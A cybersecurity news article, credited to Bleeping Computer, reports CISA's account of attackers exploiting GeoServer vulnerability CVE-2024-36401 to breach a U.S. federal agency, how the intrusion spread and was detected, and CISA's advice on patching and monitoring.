Hackers Breach Federal Agency via GeoServer Flaw, CISA Warns

A critical vulnerability in GeoServer software was recently exploited to breach a U.S. federal agency’s network, according to a warning from the Cybersecurity and Infrastructure Security Agency (CISA). The incident, which occurred last year, began when attackers compromised an unpatched GeoServer instance belonging to an unnamed federal civilian executive branch agency. This security flaw, identified as CVE-2024-36401, is a severe remote code execution vulnerability for which a patch was released on June 18, 2024.

CISA officially added this vulnerability to its catalog of known exploited weaknesses about a month after the patch became available. This action followed the public release of proof-of-concept exploits by multiple security researchers, which clearly demonstrated how to achieve code execution on vulnerable servers. Although CISA did not detail the exact methods used in real-world attacks, independent threat monitoring services observed malicious activity beginning in early July. One open-source intelligence search engine reported that more than 16,000 GeoServer servers were exposed online at the time.

The attack on the federal agency unfolded in distinct stages. Threat actors first gained access to the agency’s GeoServer server just two days after initial attacks were detected globally. They compromised a second server approximately two weeks later. From this initial foothold, the attackers moved laterally across the network, successfully breaching both a web server and an SQL server. On these compromised systems, they deployed various malicious tools, including the well-known China Chopper web shell, alongside other scripts designed to provide remote access, ensure persistence, execute commands, and escalate privileges.

Once inside the network, the intruders heavily relied on brute force attacks to crack passwords, a technique that facilitated their lateral movement and attempts to gain higher-level access. They also managed to access service accounts by exploiting the services associated with them. The attackers’ presence went unnoticed for a period of three weeks. Detection finally occurred when the agency’s Endpoint Detection and Response (EDR) solution alerted its Security Operations Center (SOC) to a suspicious file on the SQL Server on July 31, 2024.

A series of subsequent EDR alerts related to the malicious activity prompted the SOC team to immediately isolate the affected server. An investigation was launched with direct assistance from CISA to contain the breach and assess the damage. In response to this incident, CISA is strongly urging all network defenders to prioritize patching critical vulnerabilities, especially those listed in its Known Exploited Vulnerabilities catalog. The agency also emphasizes the need for security operations centers to maintain continuous, vigilant monitoring of EDR alerts and to strengthen their overall incident response plans.

This advisory follows another recent CISA publication from July, which detailed findings from a proactive hunt operation at a separate U.S. critical infrastructure organization. While that engagement found no evidence of a active breach, it uncovered significant cybersecurity risks. These included insecurely stored credentials, shared local administrator passwords across numerous workstations, overly permissive remote access for admin accounts, inadequate logging procedures, and problems with network segmentation.

(Source: Bleeping Computer)